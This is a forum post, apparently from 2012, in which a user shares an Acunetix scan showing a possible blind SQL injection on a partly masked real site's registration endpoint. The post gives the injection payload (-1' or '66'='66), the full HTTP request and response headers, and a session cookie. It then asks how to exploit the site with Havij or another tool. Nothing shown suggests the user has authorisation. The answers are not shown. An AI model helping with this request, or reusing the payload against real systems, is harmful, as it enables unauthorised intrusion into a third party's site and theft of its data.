Hi guys, i've found a vulnerability in a site by using site crawler in Acunetix . . . Its says the link may be vulnerable to BLIND SQLI . . . Here is the data i got
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.
Question
dR.fAn0Hi guys, i've found a vulnerability in a site by using site crawler in Acunetix . . . Its says the link may be vulnerable to BLIND SQLI . . . Here is the data i got
This vulnerability affects /onlinereg/rtmc_bank/.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded POST input rtmc_reg_no was set to -1' or '66'='66
View HTTP headers
Request
POST /onlinereg/rtmc_bank/ HTTP/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=42sq0klh22o83cjq9mf8fa7du5; dynatree-active=; dynatree-focus=; dynatree-expand=; dynatree-select=
Host: 111.68.*.* (Cant expose the site)
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
rtmc_reg_no=-1%27%20or%2066%20%3d%20%2764&verify_submitted=YResponse
HTTP/1.1 200 OK
Date: Fri, 29 Jun 2012 13:08:10 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 7594
Connection: close
Content-Type: text/html; charset=UTF-8
Can anyone plz help how to exploit this by using havij or some other tool . . .
Any help would be appreciated :huh:
Edited by dR.fAn0Link to comment
Share on other sites
2 answers to this question
Recommended Posts